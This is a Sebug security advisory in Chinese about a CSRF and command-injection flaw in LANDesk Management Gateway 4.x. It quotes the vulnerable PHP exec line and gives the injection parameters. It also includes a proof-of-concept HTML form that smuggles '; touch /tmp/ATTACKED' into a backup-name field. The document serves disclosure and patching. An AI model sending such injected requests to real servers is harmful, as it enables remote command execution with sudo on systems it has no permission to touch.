Sign in

LANDesk管理网关工具跨站脚本和跨站请求伪造漏洞

SSV ID:19099
Published:2010-02-05
Vulnerable:
LANDesk Software LANDesk Management Gateway 4.2
LANDesk Software LANDesk Management Gateway 4.0
Discription:
BUGTRAQ  ID: 38119
CVE ID: CVE-2010-0368,CVE-2010-0369

LANDesK管理网关工具是安全的系统管理套件。

Landesk管理网关工具没有充分验证提交特制请求的用户,当Web应用接收到删除之前所生成备份的请求时,会由 gsb/BackupRestoreTab.php处理该请求:

/-----
19  $cmd = "sudo /subin/backuptool --delete {$_POST['delBackupName']}";
20  exec($cmd);
21  $msg = "Successfully Removed: {$_POST['delBackupName']}
- -----/

攻击者可以通过创建delBackupName参数诱骗客户端向web服务器提交非预期的请求,生成并发送将在Web服务器环境(BackupRestoreTab.php:20)中执行的任意命令行(BackupRestoreTab.php:19)。

如果要触发这个漏洞,必须能够向gsb/datetime.php发送带有以下参数的POST请求:

/-----
<delBackupName>: 'a; [injection]'
<backupRestoreFormSubmitted>: 'b'
- -----/
<*References
http://secunia.com/advisories/38474/
http://marc.info/?l=bugtraq&m=126538631521391&w=2
*>
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
/-----
<html>
  <head><title>LANDesk PoC</title></head>
  <body>
    <form method="post" action="https://[server]/gsb/datetime.php">
      <input type="text" name="delBackupName" value="; touch
/tmp/ATTACKED">
      <input type="text" name="backupRestoreFormSubmitted" value="b">
      <input type="submit" value="Attack!">
    </form>
  </body>
</html>
- -----/
SEBUG Solution:
厂商补丁:

LANDesk Software
----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://community.landesk.com/support/docs/DOC-8333/
// sebug.net [2010-02-08]